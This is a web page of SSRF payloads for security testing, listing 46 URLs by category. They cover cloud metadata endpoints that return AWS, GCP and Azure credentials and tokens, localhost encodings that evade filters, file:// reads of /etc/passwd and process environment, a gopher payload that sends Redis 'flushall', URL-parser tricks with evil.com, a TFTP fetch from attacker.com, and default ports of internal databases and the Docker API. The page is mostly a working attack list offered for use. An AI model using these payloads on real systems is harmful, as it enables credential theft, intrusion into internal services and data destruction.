SSRF Cheat Sheet

Server-Side Request Forgery payloads for accessing internal services, cloud metadata, and bypassing filters. (46 payloads)

Cloud Metadata

(10)

http://169.254.169.254/latest/meta-data/

AWS instance metadata v1AWS

http://169.254.169.254/latest/meta-data/iam/security-credentials/

AWS IAM role credentialsAWS

http://169.254.169.254/latest/user-data

AWS user data (startup scripts)AWS

http://169.254.169.254/latest/api/token

AWS IMDSv2 token endpoint (PUT only)AWS

http://metadata.google.internal/computeMetadata/v1/

GCP metadata (requires Metadata-Flavor header)GCP

http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

GCP access tokenGCP

http://169.254.169.254/metadata/instance?api-version=2021-02-01

Azure instance metadataAzure

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

Azure managed identity tokenAzure

http://100.100.100.200/latest/meta-data/

Alibaba Cloud metadataAlibaba

http://169.254.169.254/openstack/latest/meta_data.json

OpenStack metadataOpenStack

IP Bypass Techniques

(12)

http://127.0.0.1

Standard localhost

http://0.0.0.0

All interfaces

http://0

Shortened zero IP

http://2130706433

127.0.0.1 as decimal

http://0x7f000001

127.0.0.1 as hex

http://0177.0.0.1

127.0.0.1 as octal

http://[::1]

IPv6 loopback

http://[::ffff:127.0.0.1]

IPv6-mapped IPv4

http://127.1

Shortened IPv4

http://127.0.0.1.nip.io

DNS rebinding via nip.io

http://localtest.me

DNS that resolves to 127.0.0.1

http://spoofed.burpcollaborator.net

Burp Collaborator DNS rebinding

Protocol Smuggling

(7)

file:///etc/passwd

Local file read via file:// protocol

file:///proc/self/environ

Environment variables via file://

dict://127.0.0.1:6379/INFO

Redis info via DICT protocol

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a

Redis command via Gopher

gopher://127.0.0.1:25/_HELO%20localhost%0d%0aMAIL%20FROM...

SMTP via Gopher

ldap://127.0.0.1:389/%0astats%0aquit

LDAP protocol access

tftp://attacker.com/file

TFTP file fetch

URL Parsing Tricks

(7)

http://evil.com@127.0.0.1

@ sign to confuse URL parser

http://127.0.0.1#@evil.com

Fragment trick

http://127.0.0.1%00@evil.com

Null byte in URL

http://127.0.0.1?@evil.com

Query string trick

http://evil.com\@127.0.0.1

Backslash before @ sign

http://127。0。0。1

Fullwidth dot characters

http://①②⑦.⓪.⓪.①

Circled digit characters

Internal Services

(10)

http://127.0.0.1:22

SSH service banner

http://127.0.0.1:6379

Redis (default port)

http://127.0.0.1:11211

Memcached (default port)

http://127.0.0.1:27017

MongoDB (default port)

http://127.0.0.1:9200

Elasticsearch (default port)

http://127.0.0.1:3306

MySQL (default port)

http://127.0.0.1:5432

PostgreSQL (default port)

http://127.0.0.1:8080

Common internal web server

http://127.0.0.1:8500

Consul API (default port)

http://127.0.0.1:2375

Docker API (unauth)

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

SSRF Open Redirect

Related Cheat Sheets

XSS Cheat Sheet Command Injection Cheat Sheet

$loading...